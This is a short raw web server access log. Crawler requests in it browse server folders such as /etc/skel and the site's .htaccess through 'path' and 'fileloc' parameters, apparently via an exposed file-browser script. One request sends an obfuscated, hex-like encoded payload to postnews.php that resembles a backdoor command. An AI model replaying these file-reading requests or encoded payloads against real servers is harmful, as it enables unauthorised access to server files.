74.7.227.14 - - [03/Nov/2025:05:57:13 +1000] "GET /1148528?path=//etc/skel HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:57:14 +1000] "GET /1111549104?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fgoogle8c847950a0446b02.html&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 12617 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:57:17 +1000] "GET /1110890816?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 60472 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:57:19 +1000] "GET /1356800?path=//etc/skel HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:57:20 +1000] "GET /1110977520?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F.htaccess&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 14647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:57:23 +1000] "GET /1110921728?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F.htaccess&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 14647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:57:26 +1000] "GET /1111397792?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F.htaccess&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 14647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:57:27 +1000] "GET /1073904?path=//usr/lib/dracut HTTP/1.0" 200 27119 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:05:54:35 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131363837352p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323131333237352q6564346666393861346539373961336635323239616133633437323931646231222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
212.16.195.25 - - [03/Nov/2025:05:57:26 +1000] "GET / HTTP/1.0" 200 60472 "http://212.16.195.25" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
